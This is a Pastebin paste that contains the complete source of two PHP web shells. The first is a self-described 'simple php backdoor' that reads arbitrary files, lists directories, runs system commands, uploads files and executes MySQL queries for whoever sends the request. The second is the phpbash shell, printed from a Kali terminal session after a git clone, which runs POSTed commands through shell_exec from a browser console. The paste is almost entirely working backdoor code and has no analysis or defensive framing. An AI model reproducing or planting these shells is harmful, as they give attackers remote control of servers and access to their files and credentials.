API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 20th, 2020
563
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.68 KB | None | 0 0
raw download clone embed print report
  1. <?
  2. // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
  3.  
  4. ob_implicit_flush();
  5. if(isset($_REQUEST['f'])){
  6. $filename=$_REQUEST['f'];
  7. $file=fopen("$filename","rb");
  8. fpassthru($file);
  9. die;
  10. }
  11. if(isset($_REQUEST['d'])){
  12. $d=$_REQUEST['d'];
  13. echo "<pre>";
  14. if ($handle = opendir("$d")) {
  15. echo "<h2>listing of $d</h2>";
  16. while ($dir = readdir($handle)){
  17. if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
  18. else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
  19. echo "$dir\n";
  20. echo "</font></a>";
  21. }
  22.  
  23. } else echo "opendir() failed";
  24. closedir($handle);
  25. die ("<hr>");
  26. }
  27. if(isset($_REQUEST['c'])){
  28. echo "<pre>";
  29. system($_REQUEST['c']);
  30. die;
  31. }
  32. if(isset($_REQUEST['upload'])){
  33.  
  34. if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
  35. else $dir=$_REQUEST['dir'];
  36. $fname=$HTTP_POST_FILES['file_name']['name'];
  37. if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
  38. die('file uploading error.');
  39. }
  40. if(isset($_REQUEST['mquery'])){
  41.  
  42. $host=$_REQUEST['host'];
  43. $usr=$_REQUEST['usr'];
  44. $passwd=$_REQUEST['passwd'];
  45. $db=$_REQUEST['db'];
  46. $mquery=$_REQUEST['mquery'];
  47. mysql_connect("$host", "$usr", "$passwd") or
  48. die("Could not connect: " . mysql_error());
  49. mysql_select_db("$db");
  50. $result = mysql_query("$mquery");
  51. if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
  52. while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
  53. mysql_free_result($result);
  54. die;
  55. }
  56. ?>
  57. <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
  58. <form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
  59. upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
  60. <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
  61. <br>for example:
  62. http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
  63. or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
  64. <hr>execute mysql query:
  65. <form action="<? echo $PHP_SELF; ?>" METHOD=GET >
  66. host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
  67.  
  68. database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
  69. </form>
  70.  
  71. <!-- http://michaeldaw.org 2006 -->
  72. root@kali:~/IDF# git clone https://github.com/Arrexel/phpbash.git
  73. Cloning into 'phpbash'...
  74. remote: Enumerating objects: 85, done.
  75. remote: Total 85 (delta 0), reused 0 (delta 0), pack-reused 85
  76. Unpacking objects: 100% (85/85), done.
  77. root@kali:~/IDF# ls
  78. Bing.url credenitals.txt decrypt.rar hash README.txt
  79. c2.pcap.rar d2.rar.rar decrypt.rar.rar new run
  80. Challenge2 d3.rar dec.txt newfile shell.php
  81. Challenge2.pcap.rar '#decrypt.py#' desktop.ini p0wny-shell WebExploitationTool
  82. classified_document.txt decrypt.py file phpbash work
  83. root@kali:~/IDF# cd ph
  84. bash: cd: ph: No such file or directory
  85. root@kali:~/IDF# cd phpbash/
  86. root@kali:~/IDF/phpbash# ls
  87. LICENSE phpbash.min.php phpbash.php README.md
  88. root@kali:~/IDF/phpbash# cat phpbash.php
  89. <?php
  90. /* phpbash by Alexander Reid (Arrexel) */
  91. if (ISSET($_POST['cmd'])) {
  92. $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
  93. foreach ($output as $line) {
  94. echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
  95. }
  96. die();
  97. } else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
  98. $filename = $_FILES["file"]["name"];
  99. $path = $_POST['path'];
  100. if ($path != "/") {
  101. $path .= "/";
  102. }
  103. if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) {
  104. echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
  105. } else {
  106. echo "Error uploading " . htmlentities($filename);
  107. }
  108. die();
  109. }
  110. ?>
  111.  
  112. <html>
  113. <head>
  114. <title></title>
  115. <style>
  116. html, body {
  117. max-width: 100%;
  118. }
  119.  
  120. body {
  121. width: 100%;
  122. height: 100%;
  123. margin: 0;
  124. background: #000;
  125. }
  126.  
  127. body, .inputtext {
  128. font-family: "Lucida Console", "Lucida Sans Typewriter", monaco, "Bitstream Vera Sans Mono", monospace;
  129. font-size: 14px;
  130. font-style: normal;
  131. font-variant: normal;
  132. font-weight: 400;
  133. line-height: 20px;
  134. overflow: hidden;
  135. }
  136.  
  137. .console {
  138. width: 100%;
  139. height: 100%;
  140. margin: auto;
  141. position: absolute;
  142. color: #fff;
  143. }
  144.  
  145. .output {
  146. width: auto;
  147. height: auto;
  148. position: absolute;
  149. overflow-y: scroll;
  150. top: 0;
  151. bottom: 30px;
  152. left: 5px;
  153. right: 0;
  154. line-height: 20px;
  155. }
  156.  
  157. .input form {
  158. position: relative;
  159. margin-bottom: 0px;
  160. }
  161.  
  162. .username {
  163. height: 30px;
  164. width: auto;
  165. padding-left: 5px;
  166. line-height: 30px;
  167. float: left;
  168. }
  169.  
  170. .input {
  171. border-top: 1px solid #333333;
  172. width: 100%;
  173. height: 30px;
  174. position: absolute;
  175. bottom: 0;
  176. }
  177.  
  178. .inputtext {
  179. width: auto;
  180. height: 30px;
  181. bottom: 0px;
  182. margin-bottom: 0px;
  183. background: #000;
  184. border: 0;
  185. float: left;
  186. padding-left: 8px;
  187. color: #fff;
  188. }
  189.  
  190. .inputtext:focus {
  191. outline: none;
  192. }
  193.  
  194. ::-webkit-scrollbar {
  195. width: 12px;
  196. }
  197.  
  198. ::-webkit-scrollbar-track {
  199. background: #101010;
  200. }
  201.  
  202. ::-webkit-scrollbar-thumb {
  203. background: #303030;
  204. }
  205. </style>
  206. </head>
  207. <body>
  208. <div class="console">
  209. <div class="output" id="output"></div>
  210. <div class="input" id="input">
  211. <form id="form" method="GET" onSubmit="sendCommand()">
  212. <div class="username" id="username"></div>
  213. <input class="inputtext" id="inputtext" type="text" name="cmd" autocomplete="off" autofocus>
  214. </form>
  215. </div>
  216. </div>
  217. <form id="upload" method="POST" style="display: none;">
  218. <input type="file" name="file" id="filebrowser" onchange='uploadFile()' />
  219. </form>
  220. <script type="text/javascript">
  221. var username = "";
  222. var hostname = "";
  223. var currentDir = "";
  224. var previousDir = "";
  225. var defaultDir = "";
  226. var commandHistory = [];
  227. var currentCommand = 0;
  228. var inputTextElement = document.getElementById('inputtext');
  229. var inputElement = document.getElementById("input");
  230. var outputElement = document.getElementById("output");
  231. var usernameElement = document.getElementById("username");
  232. var uploadFormElement = document.getElementById("upload");
  233. var fileBrowserElement = document.getElementById("filebrowser");
  234. getShellInfo();
  235.  
  236. function getShellInfo() {
  237. var request = new XMLHttpRequest();
  238.  
  239. request.onreadystatechange = function() {
  240. if (request.readyState == XMLHttpRequest.DONE) {
  241. var parsedResponse = request.responseText.split("<br>");
  242. username = parsedResponse[0];
  243. hostname = parsedResponse[1];
  244. currentDir = parsedResponse[2].replace(new RegExp("&sol;", "g"), "/");
  245. defaultDir = currentDir;
  246. usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
  247. updateInputWidth();
  248. }
  249. };
  250.  
  251. request.open("POST", "", true);
  252. request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  253. request.send("cmd=whoami; hostname; pwd");
  254. }
  255.  
  256. function sendCommand() {
  257. var request = new XMLHttpRequest();
  258. var command = inputTextElement.value;
  259. var originalCommand = command;
  260. var originalDir = currentDir;
  261. var cd = false;
  262.  
  263. commandHistory.push(originalCommand);
  264. switchCommand(commandHistory.length);
  265. inputTextElement.value = "";
  266.  
  267. var parsedCommand = command.split(" ");
  268.  
  269. if (parsedCommand[0] == "cd") {
  270. cd = true;
  271. if (parsedCommand.length == 1) {
  272. command = "cd "+defaultDir+"; pwd";
  273. } else if (parsedCommand[1] == "-") {
  274. command = "cd "+previousDir+"; pwd";
  275. } else {
  276. command = "cd "+currentDir+"; "+command+"; pwd";
  277. }
  278.  
  279. } else if (parsedCommand[0] == "clear") {
  280. outputElement.innerHTML = "";
  281. return false;
  282. } else if (parsedCommand[0] == "upload") {
  283. fileBrowserElement.click();
  284. return false;
  285. } else {
  286. command = "cd "+currentDir+"; " + command;
  287. }
  288.  
  289. request.onreadystatechange = function() {
  290. if (request.readyState == XMLHttpRequest.DONE) {
  291. if (cd) {
  292. var parsedResponse = request.responseText.split("<br>");
  293. previousDir = currentDir;
  294. currentDir = parsedResponse[0].replace(new RegExp("&sol;", "g"), "/");
  295. outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+originalDir+"# "+originalCommand+"</div><br>";
  296. usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
  297. } else {
  298. outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# "+originalCommand+"</div><br>" + request.responseText.replace(new RegExp("<br><br>$"), "<br>");
  299. outputElement.scrollTop = outputElement.scrollHeight;
  300. }
  301. updateInputWidth();
  302. }
  303. };
  304.  
  305. request.open("POST", "", true);
  306. request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  307. request.send("cmd="+encodeURIComponent(command));
  308. return false;
  309. }
  310.  
  311. function uploadFile() {
  312. var formData = new FormData();
  313. formData.append('file', fileBrowserElement.files[0], fileBrowserElement.files[0].name);
  314. formData.append('path', currentDir);
  315.  
  316. var request = new XMLHttpRequest();
  317.  
  318. request.onreadystatechange = function() {
  319. if (request.readyState == XMLHttpRequest.DONE) {
  320. outputElement.innerHTML += request.responseText+"<br>";
  321. }
  322. };
  323.  
  324. request.open("POST", "", true);
  325. request.send(formData);
  326. outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# Uploading "+fileBrowserElement.files[0].name+"...</div><br>";
  327. }
  328.  
  329. function updateInputWidth() {
  330. inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;
  331. }
  332.  
  333. document.onkeydown = checkForArrowKeys;
  334.  
  335. function checkForArrowKeys(e) {
  336. e = e || window.event;
  337.  
  338. if (e.keyCode == '38') {
  339. previousCommand();
  340. } else if (e.keyCode == '40') {
  341. nextCommand();
  342. }
  343. }
  344.  
  345. function previousCommand() {
  346. if (currentCommand != 0) {
  347. switchCommand(currentCommand-1);
  348. }
  349. }
  350.  
  351. function nextCommand() {
  352. if (currentCommand != commandHistory.length) {
  353. switchCommand(currentCommand+1);
  354. }
  355. }
  356.  
  357. function switchCommand(newCommand) {
  358. currentCommand = newCommand;
  359.  
  360. if (currentCommand == commandHistory.length) {
  361. inputTextElement.value = "";
  362. } else {
  363. inputTextElement.value = commandHistory[currentCommand];
  364. setTimeout(function(){ inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000; }, 0);
  365. }
  366. }
  367.  
  368. document.getElementById("form").addEventListener("submit", function(event){
  369. event.preventDefault()
  370. });
  371. </script>
  372. </body>
  373. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!